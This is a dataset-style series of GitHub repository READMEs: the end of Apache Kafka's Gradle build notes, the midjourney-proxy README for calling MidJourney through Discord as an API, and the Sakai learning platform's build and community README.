documentation](https://docs.gradle.org/current/userguide/viewing_debugging_dependencies.html) mentions using the `dependencies` or `dependencyInsight` tasks to debug dependencies for the root project or individual subprojects. Alternatively, use the `allDeps` or `allDepInsight` tasks for recursively iterating through all subprojects: ./gradlew allDeps ./gradlew allDepInsight --configuration runtimeClasspath --dependency com.fasterxml.jackson.core:jackson-databind These take the same arguments as the builtin variants. ### Determining if any dependencies could be updated ### ./gradlew dependencyUpdates ### Common build options ### The following options should be set with a `-P` switch, for example `./gradlew -PmaxParallelForks=1 test`. * `commitId`: sets the build commit ID as .git/HEAD might not be correct if there are local commits added for build purposes. * `mavenUrl`: sets the URL of the maven deployment repository (`file://path/to/repo` can be used to point to a local repository). * `maxParallelForks`: maximum number of test processes to start in parallel. Defaults to the number of processors available to the JVM. * `maxScalacThreads`: maximum number of worker threads for the scalac backend. Defaults to the lowest of `8` and the number of processors available to the JVM. The value must be between 1 and 16 (inclusive). * `ignoreFailures`: ignore test failures from junit * `showStandardStreams`: shows standard out and standard error of the test JVM(s) on the console. * `skipSigning`: skips signing of artifacts. * `testLoggingEvents`: unit test events to be logged, separated by comma. For example `./gradlew -PtestLoggingEvents=started,passed,skipped,failed test`. * `xmlSpotBugsReport`: enable XML reports for spotBugs. This also disables HTML reports as only one can be enabled at a time. * `maxTestRetries`: maximum number of retries for a failing test case. * `maxTestRetryFailures`: maximum number of test failures before retrying is disabled for subsequent tests. * `enableTestCoverage`: enables test coverage plugins and tasks, including bytecode enhancement of classes required to track said coverage. Note that this introduces some overhead when running tests and hence why it's disabled by default (the overhead varies, but 15-20% is a reasonable estimate). * `keepAliveMode`: configures the keep alive mode for the Gradle compilation daemon - reuse improves start-up time. The values should be one of `daemon` or `session` (the default is `daemon`). `daemon` keeps the daemon alive until it's explicitly stopped while `session` keeps it alive until the end of the build session. This currently only affects the Scala compiler, see https://github.com/gradle/gradle/pull/21034 for a PR that attempts to do the same for the Java compiler. * `scalaOptimizerMode`: configures the optimizing behavior of the scala compiler, the value should be one of `none`, `method`, `inline-kafka` or `inline-scala` (the default is `inline-kafka`). `none` is the scala compiler default, which only eliminates unreachable code. `method` also includes method-local optimizations. `inline-kafka` adds inlining of methods within the kafka packages. Finally, `inline-scala` also includes inlining of methods within the scala library (which avoids lambda allocations for methods like `Option.exists`). `inline-scala` is only safe if the Scala library version is the same at compile time and runtime. Since we cannot guarantee this for all cases (for example, users may depend on the kafka jar for integration tests where they may include a scala library with a different version), we don't enable it by default. See https://www.lightbend.com/blog/scala-inliner-optimizer for more details. ### Running system tests ### See [tests/README.md](tests/README.md). ### Running in Vagrant ### See [vagrant/README.md](vagrant/README.md). ### Contribution ### Apache Kafka is interested in building the community; we would welcome any thoughts or [patches](https://issues.apache.org/jira/browse/KAFKA). You can reach us [on the Apache mailing lists](http://kafka.apache.org/contact.html). To contribute follow the instructions here: * https://kafka.apache.org/contributing.html
0
novicezk/midjourney-proxy
代理 MidJourney 的discord频道,实现api形式调用AI绘图
midjourney midjourney-api
<div align="center"> <h1 align="center">midjourney-proxy</h1> English | [中文](./README_CN.md) Proxy the Discord channel for MidJourney to enable API-based calls for AI drawing [![GitHub release](https://img.shields.io/static/v1?label=release&message=v2.6.1&color=blue)](https://www.github.com/novicezk/midjourney-proxy) [![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html) </div> ## Main Functions - [x] Supports Imagine instructions and related actions - [x] Supports adding image base64 as a placeholder when using the Imagine command - [x] Supports Blend (image blending) and Describe (image to text) commands - [x] Supports real-time progress tracking of tasks - [x] Supports translation of Chinese prompts, requires configuration of Baidu Translate or GPT - [x] Prompt sensitive word pre-detection, supports override adjustment - [x] User-token connects to WSS (WebSocket Secure), allowing access to error messages and full functionality - [x] Supports multi-account configuration, with each account able to set up corresponding task queues **🚀 For more features, please refer to [midjourney-proxy-plus](https://github.com/litter-coder/midjourney-proxy-plus)** > - [x] Supports all the features of the open-source version > - [x] Supports Shorten (prompt analysis) command > - [x] Supports focus shifting: Pan ⬅️ ➡️ ⬆️ ⬇️ > - [x] Supports image zooming: Zoom 🔍 > - [x] Supports local redrawing: Vary (Region) 🖌 > - [x] Supports nearly all associated button actions and the 🎛️ Remix mode > - [x] Supports retrieving the seed value of images > - [x] Account pool persistence, dynamic maintenance > - [x] Supports retrieving account /info and /settings information > - [x] Account settings configuration > - [x] Supports Niji bot robot > - [x] Supports InsightFace face replacement robot > - [x] Embedded management dashboard page ## Prerequisites for use 1. Register and subscribe to MidJourney, create `your own server and channel`, refer to https://docs.midjourney.com/docs/quick-start 2. Obtain user Token, server ID, channel ID: [Method of acquisition](./docs/discord-params.md) ## Quick Start 1. `Railway`: Based on the Railway platform, no need for your own server: [Deployment method](./docs/railway-start.md) ; If Railway is not available, you can start using Zeabur instead. 2. `Zeabur`: Based on the Zeabur platform, no need for your own server: [Deployment method](./docs/zeabur-start.md) 3. `Docker`: Start using Docker on a server or locally: [Deployment method](./docs/docker-start.md) ## Local development - Depends on Java 17 and Maven - Change configuration items: Edit src/main/resources/application.yml - Project execution: Start the main function of ProxyApplication - After changing the code, build the image: Uncomment VOLUME in the Dockerfile, then execute `docker build . -t midjourney-proxy` ## Configuration items - mj.accounts: Refer to [Account pool configuration](./docs/config.md#%E8%B4%A6%E5%8F%B7%E6%B1%A0%E9%85%8D%E7%BD%AE%E5%8F%82%E8%80%83) - mj.task-store.type: Task storage method, default is in_memory (in memory, lost after restart), Redis is an alternative option. - mj.task-store.timeout: Task storage expiration time, tasks are deleted after expiration, default is 30 days. - mj.api-secret: API key, if left empty, authentication is not enabled; when calling the API, you need to add the request header 'mj-api-secret'. - mj.translate-way: The method for translating Chinese prompts into English, options include null (default), Baidu, or GPT. - For more configuration options, see [Configuration items](./docs/config.md) ## Related documentation 1. [API Interface Description](./docs/api.md) 2. [Version Update Log](https://github.com/novicezk/midjourney-proxy/wiki/%E6%9B%B4%E6%96%B0%E8%AE%B0%E5%BD%95) ## Precautions 1. Frequent image generation and similar behaviors may trigger warnings on your Midjourney account. Please use with caution. 2. For common issues and solutions, see [Wiki / FAQ](https://github.com/novicezk/midjourney-proxy/wiki/FAQ) 3. Interested friends are also welcome to join the discussion group. If the group is full from scanning the code, you can add the administrator’s WeChat to be invited into the group. Please remark: mj join group. <img src="https://raw.githubusercontent.com/novicezk/midjourney-proxy/main/docs/manager-qrcode.png" width="220" alt="微信二维码"/> ## Application Project If you have a project that depends on this one and is open source, feel free to contact the author to be added here for display. - [wechat-midjourney](https://github.com/novicezk/wechat-midjourney) : A proxy WeChat client that connects to MidJourney, intended only as an example application scenario, will no longer be updated. - [chatgpt-web-midjourney-proxy](https://github.com/Dooy/chatgpt-web-midjourney-proxy) : chatgpt web, midjourney, gpts,tts, whisper A complete UI solution - [chatnio](https://github.com/Deeptrain-Community/chatnio) : The next-generation AI one-stop solution for B/C end, an aggregated model platform with exquisite UI and powerful functions - [new-api](https://github.com/Calcium-Ion/new-api) : An API interface management and distribution system compatible with the Midjourney Proxy - [stable-diffusion-mobileui](https://github.com/yuanyuekeji/stable-diffusion-mobileui) : SDUI, based on this interface and SD (System Design), can be packaged with one click to generate H5 and mini-programs. - [MidJourney-Web](https://github.com/ConnectAI-E/MidJourney-Web) : 🍎 Supercharged Experience For MidJourney On Web UI ## Open API Provides unofficial MJ/SD open API, add administrator WeChat for inquiries, please remark: api ## Others If you find this project helpful, please consider giving it a star. [![Star History Chart](https://api.star-history.com/svg?repos=novicezk/midjourney-proxy&type=Date)](https://star-history.com/#novicezk/midjourney-proxy&Date)
0
sakaiproject/sakai
Sakai is a freely available, feature-rich technology solution for learning, teaching, research and collaboration. Sakai is an open source software suite developed by a diverse and global adopter community.
education hacktoberfest java lms sakai sakai-cle tomcat vle
# Sakai Collaboration and Learning Environment (Sakai CLE) This is the source code for the Sakai CLE. The master branch is the most current development release, Sakai 24. The other branches are currently or previously supported releases. See below for more information on the release plan and support schedule. ## Building [![Build Status](https://travis-ci.org/sakaiproject/sakai.svg?branch=master)](https://travis-ci.org/sakaiproject/sakai) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/c68908d6bc044e95b453bae7ddcbad4a)](https://www.codacy.com/app/sakaiproject/sakai?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=sakaiproject/sakai&amp;utm_campaign=Badge_Grade) This is the "Mini Quick Start" for more complete steps to get Sakai configured please look at [this guide on the wiki](https://github.com/sakaiproject/sakai/wiki/Quick-Start-from-Source). To build Sakai you need Java 1.8. Once you have, clone a copy of this repository you can build it by running (or `./mvnw install` if you don't have Maven installed): ``` mvn install ``` ## Running Sakai runs on Apache Tomcat 9. Download the latest version from http://tomcat.apache.org and extract the archive. *Note: Sakai does not work with Tomcat installed via a package from apt-get, yum or other package managers.* You **must** configure Tomcat according to the instructions on this page: https://sakaiproject.atlassian.net/wiki/spaces/DOC/pages/17310646930/Sakai+21+Install+Guide+Source When you are done, deploy Sakai to Tomcat: ``` mvn clean install sakai:deploy -Dmaven.tomcat.home=/path/to/your/tomcat ``` Now start Tomcat: ``` cd /path/to/your/tomcat/bin ./startup.sh && tail -f ../logs/catalina.out ``` Once Sakai has started up (it usually takes around 30 seconds), open your browser and navigate to http://localhost:8080/portal ## Licensing Sakai is licensed under the [Educational Community License version 2.0](http://opensource.org/licenses/ECL-2.0) Sakai is an [Apereo Foundation](http://www.apereo.org) project and follows the Foundation's guidelines and requirements for [Contributor License Agreements](https://www.apereo.org/licensing). ## Contributing See [our dedicated page](CONTRIBUTING.md) for more information on contributing to Sakai. ## Bugs For filing bugs against Sakai please use our Jira instance: https://jira.sakaiproject.org/ ## Nightly servers For testing out the latest builds go to the [nightly server page](http://nightly2.sakaiproject.org) ## Get in touch If you have any questions, please join the Sakai developer mailing list: To subscribe send an email to sakai-dev+subscribe@apereo.org To see a full list of Sakai email lists and other communication channels, please check out this Sakai wiki page: https://confluence.sakaiproject.org/display/PMC/Sakai+email+lists If you want more immediate response during M-F typical business hours you could try our Slack channels. https://apereo.slack.com/signup If you can't find your "at institution.edu" on the Apereo signup page then send an email requesting access for yourself and your institution either to sakai-qa-planners@apereo.org or sakaicoordinator@apereo.org. ## Community supported versions These versions are actively supported by the community. Sakai 23.1 ([release](http://source.sakaiproject.org/release/23.1/) | [fixes](https://confluence.sakaiproject.org/display/DOC/23.1+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+23+Release+Notes)) Sakai 22.4 ([release](http://source.sakaiproject.org/release/22.4/) | [fixes](https://confluence.sakaiproject.org/display/DOC/22.4+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+22+Release+Notes)) ## Previous community versions which are no longer supported These versions are no longer supported by the community and will only receive security changes. Sakai 21.5 ([release](http://source.sakaiproject.org/release/21.5/) | [fixes](https://confluence.sakaiproject.org/display/DOC/21.5+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+21+Release+Notes)) Sakai 20.6 ([release](http://source.sakaiproject.org/release/20.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/20.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+20+Release+Notes)) Sakai 19.6 ([release](http://source.sakaiproject.org/release/19.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/19.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+19+Release+Notes)) Sakai 12.7 ([release](http://source.sakaiproject.org/release/12.7/) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+12+Release+Notes)) Sakai 11.4 ([release](http://source.sakaiproject.org/release/11.4/)) For full history of supported releases please see our [release information on confluence](https://confluence.sakaiproject.org/display/DOC/Sakai+Release+Date+list). ## Under Development [Sakai 23.2](https://confluence.sakaiproject.org/display/REL/Sakai+23+Straw+person) is the current development release of Sakai 23. It is expected to release Q2 2024. [Sakai 22.5](https://confluence.sakaiproject.org/display/REL/Sakai+22+Straw+person) is the current development release of Sakai 22. It is expected to release Q2 2024. ## Accessibility [The Sakai Accessibility Working Group](https://confluence.sakaiproject.org/display/2ACC/Accessibility+Working+Group) is responsible for ensuring that the Sakai framework and its tools are accessible to persons with disabilities. [The Sakai Ra11y plan](https://confluence.sakaiproject.org/display/2ACC/rA11y+Plan) is working towards a VPAT and/or a WCAG2 certification. CKSource has created a GPL licensed open source version of their [Accessibility Checker](https://cksource.com/ckeditor/services#accessibility-checker) that lets you inspect the accessibility level of content created in CKEditor and immediately solve any accessibility issues that are found. CKEditor is the open source rich text editor used throughout Sakai. While the Accessibility Checker, due to the GPL license, can not be bundled with Sakai, it can be used with Sakai and the A11y group has created [instructions](https://confluence.sakaiproject.org/display/2ACC/CKEditor+Accessibility+Checker) to help you. ## Skinning Sakai Documentation on how to alter the Sakai skin (look and feel) is here https://github.com/sakaiproject/sakai/tree/master/library ## Translating Sakai Translation, internationalization and localization of the Sakai project are coordinated by the Sakai Internationalization/localization community. This community maintains a publicly-accessible report that tracks what percentage of Sakai has been translated into various global languages and dialects. If the software is not yet available in your language, you can translate it with support from the broader Sakai Community to assist you. From its inception, the Sakai project has been envisioned and designed for global use. Complete or majority-complete translations of Sakai are available in the languages listed below. ### Supported languages | Locale | Language| | ------ | ------ | | en_US | English (Default) | | ca_ES | Catalán | | de_DE | German | | es_ES | Español | | eu | Euskera | | fa_IR | Farsi | | fr_FR | Français | | hi_IN | Hindi | | ja_JP | Japanese | | mn | Mongolian | | pt_BR | Portuguese (Brazil) | | sv_SE | Swedish | | tr_TR | Turkish | | zh_CN | Chinese | | ar | Arabic | | ro_RO | Romanian | | bg | Bulgarian | | sr | Serbian | ### Other languages Other languages have been declared legacy in Sakai 19 and have been moved to [Sakai Contrib as language packs](https://github.com/sakaicontrib/legacy-language-packs). ## Community (contrib) tools A number of institutions have written additional tools for Sakai that they use in their local installations, but are not yet in an official release of Sakai. These are being collected at https://github.com/sakaicontrib where you will find information about each one. You might find just the thing you are after!
0